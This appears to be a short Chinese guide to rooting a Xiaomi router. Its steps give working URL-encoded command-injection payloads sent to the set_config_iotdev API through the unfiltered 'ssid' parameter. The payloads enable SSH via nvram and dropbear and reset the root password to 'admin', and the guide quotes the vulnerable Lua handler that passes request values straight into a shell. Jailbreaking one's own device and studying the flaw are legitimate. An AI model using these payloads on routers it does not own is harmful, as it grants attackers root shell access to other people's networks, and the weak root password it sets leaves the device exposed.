1. 下载固件
2. 登录管理页面
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router
3. 打开 SSH (替换Token)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
4. 更新root帐号密码为admin
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
5. 禁用路由器固件更新,否则自动更新后会失效
开启SSH原理
function setConfigIotDev()
local XQFunction = require("xiaoqiang.common.XQFunction")
local LuciUtil = require("luci.util")
local result = {
["code"] = 0
}
local ssid = LuciHttp.formvalue("ssid") ----参数直接代入,未过滤
local bssid = LuciHttp.formvalue("bssid")----参数直接代入,未过滤
local uid = LuciHttp.formvalue("user_id")----参数直接代入,未过滤
XQLog.log(debug_level, "ssid = "..ssid)
XQLog.log(debug_level, "bssid = "..bssid)
XQLog.log(debug_level, "uid = "..uid)
if XQFunction.isStrNil(ssid)
or XQFunction.isStrNil(bssid)
or XQFunction.isStrNil(uid) then
result.code = 1523
end
if result.code ~= 0 then
result["msg"] = XQErrorUtil.getErrorMessage(result.code)
else
XQFunction.forkExec("connect -s "..ssid.." -b "..bssid.. " -u "..uid)----参数直接代入,未过滤
end
LuciHttp.write_json(result)
end